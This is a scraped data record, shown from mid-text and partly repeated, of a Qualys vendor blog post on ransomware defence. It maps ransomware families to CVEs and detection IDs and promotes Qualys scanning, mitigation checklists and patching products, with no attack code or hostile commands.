\n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture2.png)\n\n### Continuous detection &amp; prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture2.png)\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. 
\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture4-1070x377.png)\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture4.png)\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture6.png)\n\nQualys provides the ability for a Unified Dashboard approach with the key metrics across all Apps providing key metrics against your overall security posture against Ransomware Related data points such as: \n\n * Ransomware Related vulnerabilities \n * Unauthorized Software \n * Misconfigurations leveraged by ransomware \n * Internet Facing Hosts with RDP vulnerabilities and many more\u2026 \n\nThe Unified Dashboard enabled you to track your ransomware exposure, against impacted hosts, their status, and overall management in real-time. 
\n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy which contains the critical controls mapped to MITRE ATT&amp;CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and the lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. 
Employ best practices for use of Remote Desktop Protocol, e.g.
\n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive &amp; Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). 
\n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys patch management to remediate ransomware related vulnerabilities is to leverage the VMDR prioritization report, as described in a previous section, this report can be used to detect assets with ransomware related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture8-1070x791.png)\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar October 21, 2021, at 10am Pacific. Sign up now! 
\n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment &amp; Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment &amp; Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "published": "2021-10-05T12:50:00", "modified": "2021-10-05T12:50:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": true, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": 
"https://blog.qualys.com/category/product-tech", "reporter": "Anand Paturi", "references": [], "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "immutableFields": [], "lastseen": "2021-10-05T16:35:26", "history": [{"bulletin": {"id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "hash": "6711a1d75d7feabee66135185eba5e4a", "type": "qualysblog", "bulletinFamily": "blog", "title": "The Rise of Ransomware", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. 
\n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university&#x27;s network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. 
\n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment &amp; Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. It is a very common practice in organizations as it provides easy access to systems remotely. 
Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture1.png)\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. 
This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. 
| CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together, such as internet-facing vulnerabilities, misconfigurations, and unauthorized software. The Qualys Ransomware Risk Assessment &amp; Remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to a ransomware-related vulnerability or misconfiguration and take the needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/qualys-ransomware-screenshot-1-1070x795.png)\n\nIn addition, organizations should implement a good cyber hygiene program to scan for vulnerabilities and discover misconfigurations regularly, with sufficient detection capabilities (such as the relevant QIDs) enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly and at the scale needed. \n\n### Qualys Ransomware Risk Assessment &amp; Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from the Qualys product portfolio and how they can be uniquely valuable in the effort to combat ransomware attacks. \n\n#### Detect your critical data assets &amp; monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nCSAM enables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. 
\n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture1.png)\n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. 
\n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture2.png)\n\n### Continuous detection &amp; prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture2.png)\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. 
\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware\u2019 asset tag in the Vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture4-1070x377.png)\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture4.png)\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With the \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the hosts impacted by each threat. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture6.png)\n\nQualys provides a Unified Dashboard approach with key metrics across all apps, showing your overall security posture against ransomware-related data points such as: \n\n * Ransomware-related vulnerabilities \n * Unauthorized software \n * Misconfigurations leveraged by ransomware \n * Internet-facing hosts with RDP vulnerabilities, and many more\u2026 \n\nThe Unified Dashboard enables you to track your ransomware exposure, impacted hosts, their status, and overall management in real time. 
\n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy, which contains the critical controls mapped to MITRE ATT&amp;CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [FireEye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images conform to security baselines, prevent images from ever having misconfigurations, and identify configuration drift to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified the top five security measures and configuration controls that a security team should consider for their organization to prevent business interruption from a ransomware attack. The research is based on best practices published by FireEye (Mandiant), the Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies, e.g. \n * Minimum password age should be set. \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. 
Employ best practices for use of Remote Desktop Protocol, e.g. \n * Disable RDP services if not necessary. \n * Close unused RDP ports and audit the network for systems using RDP. \n * Apply multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * Apply RDP account controls. \n 3. Employ network security and firewalls, e.g. \n * Enforce firewall policy rules. \n * Apply a deny-all rule and allow only required networks and access. \n * Block common ports and protocols that should not be exposed. \n 4. Enforce Account Use Policies, e.g. \n * Apply account lockouts after a specified number of attempts. \n * Enforce admin approval requirements. \n * Apply UAC restrictions on network logons, etc. \n * Assign least privileges to users. \n 5. Keep Software Updated \n * Ensure automatic updates are enabled. \n * Patches and software updates should be installed in a timely manner, including for operating systems, applications, etc. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture7-1070x578.png)\n\nQualys research has mapped misconfigurations to the relevant MITRE ATT&amp;CK techniques (summarized in the table below) to define 237 configuration checks across five security areas: RDP hardening, user controls, network/protocol/port configuration security, share and password policies, and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. 
\n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive &amp; Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). 
\n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys Patch Management to remediate ransomware-related vulnerabilities is to leverage the VMDR prioritization report. As described in a previous section, this report can be used to detect assets with ransomware-related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware-related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture8-1070x791.png)\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. The webinar is on October 21, 2021, at 10am Pacific. Sign up now! 
\n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>)\n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>)\n * [Research Powered Qualys Ransomware Risk Assessment &amp; Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>)\n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>)\n * Learn more about the research and see the Qualys Ransomware Risk Assessment &amp; Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>)\n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "published": "2021-10-05T12:50:00", "modified": "2021-10-05T12:50:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": true, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": 
